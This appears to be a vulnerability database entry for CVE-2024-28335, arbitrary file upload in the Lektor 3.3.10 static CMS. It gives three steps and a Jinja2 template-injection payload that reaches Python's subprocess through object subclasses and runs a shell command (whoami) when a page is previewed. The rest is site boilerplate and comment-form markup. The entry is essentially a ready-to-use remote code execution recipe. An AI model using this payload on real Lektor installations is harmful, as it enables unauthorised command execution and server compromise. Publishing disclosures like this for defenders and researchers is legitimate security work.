Lektor 3.3.10 Arbitrary File upload

2024.03.20

kai6u (JP)

Risk: High

Local: No

Remote: Yes

CVE: CVE-2024-28335

CWE: CWE-434

# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)

Payload:

{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}

2 ) Create a new page by specifying the created contents.lr as template.

3 ) Use the preview function to check the sample page with the specified templates.

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lektor 3.3.10 Arbitrary File upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.